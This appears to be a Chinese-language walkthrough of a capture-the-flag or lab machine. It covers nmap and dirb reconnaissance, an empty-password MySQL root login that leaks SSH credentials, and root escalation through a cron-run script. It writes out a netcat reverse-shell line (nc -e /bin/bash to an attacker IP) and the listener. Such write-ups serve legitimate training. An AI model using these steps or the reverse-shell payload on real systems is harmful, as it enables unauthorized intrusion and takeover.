主机发现

sudo nmap -sn 192.168.28.0/24

TCP端口扫描:sudo nmap -sT –min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports

TCP端口版本扫描sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.28.34 -oA nmapscan/detail

脆弱性扫描:sudo nmap –script=vuln -p22,80,3306 192.168.28.34 -oA nmapscan/vuln

对80开放了一个info.php页面访问是一个phpinfo的页面

对有waf,或者是有php配置文件的设置,不能直接形成攻击面,

对http服务进行访问

目录爆破

sudo dirb -u http://xxxxx   -w 字典  #并未发现有特殊的页面,通过深度挖掘发现

sudo dirb -u http://xx -X txt,php,zip,git,rar,sql,tar – w xx

仍然什么都没有

所以只能进行暴力破解

对于mysql和ssh爆破来说,尝试mysql的暴力破解可能会更好一些,因为更有可能是弱口令和root的登录名

对mysql进行弱口令,空密码登录

sudo mysql -h 192.168.28.34 -uroot -p

密码root/空密码

发现ssh数据表展开并查看

获得ssh账户密码后登录

sudo ssh mistic@192.168.28.34

输入密码

成功getshell

权限查询

whoami  uname -a  ip a  sudo -l  

在家目录查询是否有flag

ls -liah

发现有一个sh脚本, 查看任务计划是什么权限运行cat /etc/crontab

发现是由root用户进行,我们将sh脚本写入一些反弹shell即刻提权

完善一下shell的交互性

输入clear报错

export term=xterm-color

利用各种命令(nc ,ruby,python,java,go,)进行反弹shell

写入

#!/bin/bash

nc -e /bin/bash 192.168.28.29 1234 &

kali监听

nc -lvnp 1234

成功geshell

在家目录中找flag